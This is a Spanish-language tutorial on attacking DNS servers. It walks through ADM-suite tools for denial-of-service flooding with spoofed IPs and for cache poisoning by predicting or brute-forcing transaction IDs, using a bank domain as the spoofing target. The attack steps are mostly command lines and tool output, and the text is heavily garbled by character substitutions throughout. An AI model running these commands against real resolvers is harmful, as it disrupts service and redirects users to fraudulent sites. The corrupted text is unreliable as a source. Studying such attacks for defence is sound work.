Ataque a servidores DNS

A continuacin se procede a exponer los principales ataques a servidores DNS con algn que otro
caso prctico. Para realizar las pruebas se ha utilizado la suite de herramientas AD !incluida en
bac"trac" #$ de la cual veremos las ms interesantes. %omo servidor DNS se ha utilizado &ind.
Podemos dividir los principales ataques en dos categor'as(
1.- DoS (Denial of Service)
%omo su propio nombre indica) estos ataques consisten en impedir que los usuarios utilicen el
servicio. Nos centraremos en el ataque al ancho de banda. *eamos como abordarlo con
ADMdnsfuckr.
1.1.- ADMdnsfuckr
# ADMdnsfuckr 192.168.0.100
Argumentos( +P destino
,a aplicacin manda mltiples peticiones P-. !resolucin inversa +P / dominio$ de +Ps aleatorias
al servidor DNS. Para ello realiza un par de cambios en los paquetes. Por un lado cambia la +P
origen !una para cada paquete$ empezando siempre en 011.0.01.1 !que es un rango de +Ps de las que
no se usan$. Por otro lado modi2ica el chec"sum de la cabecera 3DP poni4ndolo a 1111) entonces
manda paquetes errneos. %omo son errneos el servidor deber'a mandar la respuesta
correspondiente a cada error.
5s 2cil ver que las pruebas estn realizadas sobre un DNS que est en el mismo segmento de red.
Dicho esto 6 dependiendo de la comple7idad del servidor DNS pueden pasar dos cosas( que el
servidor trague 6 responda a cada una de las peticiones o bien que las interprete 6 no las responda
!lo que no impide que el ataque pueda ser satis2actorio$. No obstante lo habitual suele ser que el
DNS no est4 en nuestro propio segmento de red) por e7emplo en una gran organizacin o si
simplemente el atacante es externo.
De esta manera al estar 2uera del segmento existe una gran probabilidad de que el activo de red tire
la paqueter'a) 6 si ha6 un 2ire8all de por medio seguro que la tira. 5ntonces si tenemos un 2ire8all
slo queda una opcin. Si volvemos al caso del 9-raba7ador resentido: este podr'a spoo2ear con +Ps
del segmento.
Ahora aunque acotado en posibilidades el ataque ser'a e2ectivo 6a que el servidor tiene que
responder las peticiones de ese segmento. ,o nico que se podr'a hacer ser'a tomar medidas como
limitar el nmero de conexiones o reducir el ancho de banda con determinadas +Ps dado que se est
atacando con +Ps de mquinas comprometidas a las que no se les puede negar el servicio. %laro que
si el 2ire8all del segmento evita el spoo2ing no se conseguir nada.
2.- DNS Spoofing
Suplantacin de identidad por nombre de dominio. Se trata del 2alseamiento de una relacin
9Nombre de dominio;+P: ante una consulta de resolucin de nombre) es decir) resolver con una
direccin +P 2alsa un cierto nombre DNS o viceversa. Dentro del DNS Spoo2ing podemos subdividir
en ataques de -<+D !o envenenamiento de la cach4$ 6 los it !an in the iddle$. Aunque los
ltimos no van dirigidos directamente contra el servidor) suplantan las peticiones contra el mismo.
%omo es obvio) todos estos su2ren los mismos problemas de e2icacia en 2uncin de la ubicacin del
origen 6 el destino) as' como de la existencia de 2ire8alls al igual que hemos visto en el caso del
DoS en cuanto a suplantacin se re2iere.
2.1.- TXID
3n DNS utiliza un +D aleatorio para sus paquetes) pero esto solo es en la primera consulta) despu4s
lo incrementa para las sucesivas consultas de 2orma que si es posible esni2ar el DNS se puede
predecir el +D. 5n anteriores versiones de &ind esto permit'a suplantar a un DNS autoritario sobre
un DNS v'ctima 6 as' modi2icar su cach4 a voluntad.
,as versiones de &ind anteriores a la =.#.> tienen este problema) aunque actualmente todos los DNS
estn actualizados o parcheados !o al menos deber'an$. ,legados a este punto puede ser interesante
analizar el grado de vulnerabilidad de un servidor DNS. Si utilizamos el nmap con el script dns;
random;txid lo podemos analizar(
# nmap -sU --script=dns-random-txid 192.168.0.108 -p 5
!tartin" #map 5.00 $ %ttp&''nmap.or" ( at 2010-0)-02 20&22 *+!,
-nt.r.stin" ports on 192.168.0.108&
/01, !,A,+ !+12-*+
5'udp op.n domain
34 dns-random-txid& 192.168.0.108 is 51+A,& 26 6u.ri.s in ).7 s.conds from 26 txids 8it% std d.9
19069
Nos encontramos que la aleatoriedad es estupenda !?.5A-$) en caso contrario) el servidor ser'a
vulnerable.
*amos a ver el 2uncionamiento de dos de las herramientas de AD) ADsn@@2+D 6
ADn@g11d.
2.1.1.- ADMsnOOfID
# ADMsn00f-D .t%0 192.168.0.108 cua:6ui.ra.com dns.cua:6ui.ra.com 1 mi;anco.n.t )1.222.195.2)7
ns1.mi;anco.n.t
Argumentos( inter2az A DNS v'ctima A un dominio cualquiera A DNS con autoridad en el dominio
anterior A tipo de peticin DNS 0 o 0B !A o P-.$ A dominio spoo2 A ip spoo2 A DNS con autoridad en
el dominio o en la ip de spoo2
Para poder hacer uso de esta aplicacin ha6 que tener en cuenta que se necesita un DNS con
autoridad sobre un dominio 6 que podamos esni2ar sus mensa7es. 3n e7emplo claro ser'a tener ese
DNS en nuestro segmento de red o bien el DNS v'ctima. Secuencia que seguir'a la aplicacin(
5sni2ar los mensa7es de un DNS cualquiera !dns.cualquiera.com$.
Preguntar a la v'ctima !ns0.mibanco.net$ para que resuelva !rand$.cualquiera.com
!#h0qa".cualquiera.com por e7emplo$. 5n este momento 6a tendr'amos el +D actual del DNS
v'ctima 6 podemos utilizarlo para envenenar la cach4 con los pares dominio;ip que
queramos.
5l Atacante manda la resolucin para el envenenamiento !mibanco.net A #0.BBB.0CD.B#>$
incrementando el +D anterior mediante inundacin.
k.8: &(< 8. %a9. t%. pack.t =
t%. curr.nt id of 192.168.0.108 is 199)
s.nd t%. spoof...
trustip 81.12).5.6>9itcimip 192.168.0.108>spoofna mi;anco.n.t>spoofip )1.222.195.2)7>-D
199)>t?p. 1 - apr.s Mak.pak.t == )
trustip 81.12).5.6>9itcimip 192.168.0.108>spoofna mi;anco.n.t>spoofip )1.222.195.2)7>-D
1995>t?p. 1 - apr.s Mak.pak.t == )
trustip 81.12).5.6>9itcimip 192.168.0.108>spoofna mi;anco.n.t>spoofip )1.222.195.2)7>-D
1996>t?p. 1 - apr.s Mak.pak.t == )
trustip 81.12).5.6>9itcimip 192.168.0.108>spoofna mi;anco.n.t>spoofip )1.222.195.2)7>-D
1997>t?p. 1 - apr.s Mak.pak.t == )
,a v'ctima tiene ahora el par dominio;ip como una entrada legal 6 todas las mquinas que
accedan a consultarle lo recibirn como respuesta.
2.1.2.- ADMnOg00D
# ADMn0"00d 192.168.0.111 dns.cua:6ui.ra.com cua:6ui.ra.com 192.168.0.108 1 mi;anco.n.t
)1.222.195.2)7 ns1.mi;anco.n.t 2012
Argumentos( tu ip A un DNS cualquiera A dominio en el DNS anterior A DNS v'ctima A tipo de
peticin DNS 0 o 0B !A o P-.$ A dominio spoo2 A ip spoo2 A DNS con autoridad en el dominio o en
la ip de spoo2 A +D para el DNS
5sta aplicacin es id4ntica a la anterior !ADsn@@2+D$ aunque est orientada al caso de no poder
esni2ar el tr2ico para coger el +D de la v'ctima) por lo que mediante 2uerza bruta averigua el +D.
Aunque es ms lento) no de7a de ser e2ectivo. Para ello se le pasa un nmero de +D a la aplicacin 6
este se va decrementando hasta encontrar el adecuado.
tr? 2002 @ -D @ 2012
ok 8%. %a9. t%. r.pons. A(
fak.nam. = )))7861)975118.cua:6ui.ra.com
tr? 1991 @ -D @ 2001
ok 8%. %a9. t%. r.pons. A(
fak.nam. = )851)511061)2.cua:6ui.ra.com
tr? 1980 @ -D @ 1990
ok 8%. %a9. t%. r.pons. A(
fak.nam. = ))1)56888162.cua:6ui.ra.com
tr? 1969 @ -D @ 1979
ok 8%. %a9. t%. r.pons. A(
fak.nam. = )81281115070108.cua:6ui.ra.com
tr? 1958 @ -D @ 1968
ok 8%. %a9. t%. r.pons. A(
fak.nam. = 17122611780.cua:6ui.ra.com
tr? 19)7 @ -D @ 1957
ok 8%. %a9. t%. r.pons. A(
fak.nam. = 1)76698105).cua:6ui.ra.com
B
Sin embargo esta aplicacin tiene un problema) genera mucho tr2ico 6 ser'a posible una rpida
actuacin por la parte atacada a consecuencia.
2.2.- MitM
,os ataques an in the iddle !o intermediario$ son ataques contra el 2lu7o de la in2ormacin entre
dos mquinas. 5l atacante lee 6 modi2ica la in2ormacin del 2lu7o sin que se percaten las mquinas
a2ectadas. Para el caso del DNS) el atacante esni2a las peticiones DNS de la v'ctima 6 las responde
haci4ndose pasar por el servidor DNS que utiliza la v'ctima.
Para este tipo de ataques la suite AD tiene dos aplicaciones pero es su2iciente con decir que estn
ah' 6a que ha6 otras mucho ms verstiles 6 desarrolladas como ettercap. De7o como sugerencia al
lector el estudio del ettercap por su cuenta 6a que ha6 mucha documentacin por la red.